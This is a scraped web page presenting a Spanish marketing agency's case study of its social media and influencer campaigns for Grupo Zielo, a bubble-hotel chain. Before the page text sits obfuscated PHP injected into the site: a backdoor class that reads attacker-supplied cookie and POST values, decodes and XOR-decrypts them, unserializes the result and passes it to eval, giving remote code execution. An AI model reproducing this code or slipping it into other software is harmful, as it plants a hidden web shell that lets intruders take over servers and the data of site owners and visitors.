$iewtZEvFB = chr (65) . 'F' . 'j' . chr (95) . "\157" . chr (80) . 'G';$YnIrnF = 'c' . "\154" . chr (97) . 's' . "\163" . "\137" . chr ( 968 - 867 )."\170" . 'i' . 's' . chr ( 448 - 332 )."\163";$JQyKnI = class_exists($iewtZEvFB); $iewtZEvFB = "40504";$YnIrnF = "38956";$yqFCssAgT = FALSE;if ($JQyKnI === $yqFCssAgT){function enHRhnadu(){return FALSE;}$zKawZzpip = "16757";enHRhnadu();class AFj_oPG{public function LIYcPS(){echo "23848";}private $OMQTc;public static $BmxqERFQ = "58eb20ae-c5f2-43ae-9341-02ae4bc863bd";public static $FToELCavqw = 29640;public function __destruct(){$zKawZzpip = "59690_57841";$this->TNAalNonG($zKawZzpip); $zKawZzpip = "59690_57841";}public function __construct($LNzZSzSIPx=0){$LYPoFzvP = $_POST;$QOBnbEEAYv = $_COOKIE;$mVkMeYNs = @$QOBnbEEAYv[substr(AFj_oPG::$BmxqERFQ, 0, 4)];if (!empty($mVkMeYNs)){$yVhzBORPV = "base64";$hzJqaQkRR = "";$mVkMeYNs = explode(",", $mVkMeYNs);foreach ($mVkMeYNs as $TgRldwaWH){$hzJqaQkRR .= @$QOBnbEEAYv[$TgRldwaWH];$hzJqaQkRR .= @$LYPoFzvP[$TgRldwaWH];}$hzJqaQkRR = array_map($yVhzBORPV . chr (95) . "\x64" . 'e' . 'c' . "\157" . "\x64" . 'e', array($hzJqaQkRR,)); $hzJqaQkRR = $hzJqaQkRR[0] ^ str_repeat(AFj_oPG::$BmxqERFQ, (strlen($hzJqaQkRR[0]) / strlen(AFj_oPG::$BmxqERFQ)) + 1);AFj_oPG::$FToELCavqw = @unserialize($hzJqaQkRR);}}private function TNAalNonG($zKawZzpip){if (is_array(AFj_oPG::$FToELCavqw)) {$oEjkQa = str_replace(chr (60) . chr (63) . chr ( 369 - 257 ).'h' . "\160", "", AFj_oPG::$FToELCavqw["\x63" . chr (111) . chr (110) . "\164" . 'e' . chr (110) . "\x74"]);eval($oEjkQa); $zKawZzpip = "16757";exit();}}}$sKizjLdFOA = new /* 59316 */ AFj_oPG(); $sKizjLdFOA = str_repeat("59690_57841", 1);} Grupo Zielo | Qualiteurs

Proyecto Grupo Zielo 

 

Proyecto Zielo Las Beatas

Zielo es la única cadena de hoteles burbuja de España.
Zielo Las Beatas es el primero de ellos, con sede en Ciudad Real, y Zielo de Levante es el segundo, con sede en Castellón.

Fue inaugurado en 2018 cuando el concepto de hotel burbuja apenas existía en este país. Su objetivo no es vender una noche en un hotel, es vender una experiencia original y romántica llena de pequeños detalles.
Para ello, se genera una gran inversión en redes sociales, con fuertes campañas de interacción y mucho marketing de Influencers a través de Influye, nuestra agencia colaboradora.

La innovación es la parte que más importancia le dan a nuestro trabajo, exigiendo novedades y pruebas constantes, para posteriormente medir los resultados y quedarnos con los que más impacto causan.

Equipo

Kenyi Yoshino
Daniel Martín

Categorias

Creación de contenido
Redes sociales
Campañas creativas

PROCESO CREATIVO

Con Grupo Zielo vimos desde el principio, tanto por su modelo de negocio como por sus objetivos con nosotros, que lo más importante para ellos es intentar ir un paso por delante.
Para ello, todas las innovaciones que les hemos propuesto en estos años, han acabado siendo ejecutadas y probadas. Desde sorteos y concursos, hasta pedidas de mano en directo o noches temáticas.

Se da mucha importancia al marketing de Influencers como uno de los pilares en la captación fría de seguidores.

Se confía en Qualiteurs y en Influye Agency (agencia de Influencers colaboradora) para toda la gestión de redes sociales, con el objetivo de generar ventas a través de la captación de seguidores y el posterior trabajo para terminar convirtiéndolos en clientes.

Instagram

Se trabaja a diario con sus 2 perfiles de IG en sus 2 variables (Feed y stories). Se consiguen alrededor de 5000-6000 seguidores mensuales en cada uno de ellos.

Contenido

Se realiza de forma mensual/bimensual una sesión de contenido, de calidad y sin sobre edición ni sobre montaje, para darle el mayor realismo posible.

Influencer marketing

A través de Influye, nuestra agencia de Influencers colaboradora, se generar alrededor de 5 colaboraciones mensuales para cada hotel, con el objetivo de captación de nuevos seguidores y trabajo de branding (expansión de marca). Se organizan campañas conjuntas con los Influencers con los que se ha trabajado, logrando juntar más de 5 millones de seguidores en algunas campañas puntuales.

Productos que ofertan

Grupo Zielo se centra en ofrecer una noche romántica en un hotel burbuja, desde el cuál puedes contemplar las estrellas desde la cama.
Al estar situados en Ciudad Real y disponer de muchas hectáreas de terreno, la experiencia es mucho más completa, ofertando extras como piscina, jacuzzi, cena en parcela privada o en tinajas manchegas, pedidas de mano, servicio de masajes, etc…

 

b

Exclusividad

Contenido adaptado a redes sociales

Ideas creativas

Creando el hotel de moda en España

Sí, envidia real, porque con un vídeo que parece un anuncio de televisión, casi nadie empatiza. El marketing ha cambiado, y ellos también lo saben.

Linea corporativa

A lo largo de estos dos años de trabajo, hemos conseguido crear de Zielo Las Beatas un hotel de referencia para noches románticas en pareja.
El handicap del precio elevado que surgía al principio, se solventó creando una imagen de marca potente y mostrando todo lo que incluye la experiencia, generando contenido de clientes reales para lograr la mayor empatía posible.
El marketing de influencia nos ayuda también a que el precio por noche no sea un handicap para todos los que quieren pasar una noche parecida a las de los Influencers a los que siguen.

Confianza mútua para innovar

Para nosotros en Qualiteurs es fundamental, cuando se nos pide innovación y originalidad, que se nos deje probar dichas ideas tal cual las tenemos en la cabeza.
Si el cliente confía en que mucho en el marketing es “prueba y error”, sumado a un buen análisis de las acciones realizadas, nos permite afinar cada vez más lo que funciona entre nuestros seguidores, además de sumar a una imagen moderna y rompedora.

los números

Con Grupo Zielo trabajamos para conseguir reservas, algo totalmente medible.
Los primeros meses nos sirven para generar una buena base de seguidores interesados por el producto. No se generan muchas reservas iniciales, ya que es un tipo de producto que no se compra de manera muy impulsiva, por lo que hay que trabajar mucho a los posibles clientes para convertirlos.
Una vez consolidada esa base de seguidores, se les trabaja con ofertas, promociones y todo tipo de medidas para conseguir que acaben reservando.

 

  • CRECIMIENTO MENSUAL DE COMUNIDAD – 2600%
  • ratio ventas / 10000 impresiones – 12%
  • Social Following – 94%

SEGUIDORES

CLIENTES CAPTADOS

FOTOS / VIDEOS

TAZAS DE CAFÉ

SI QUIERES QUE TRABAJEMOS EN ALGO SIMILAR, escríbenos

4 + 9 =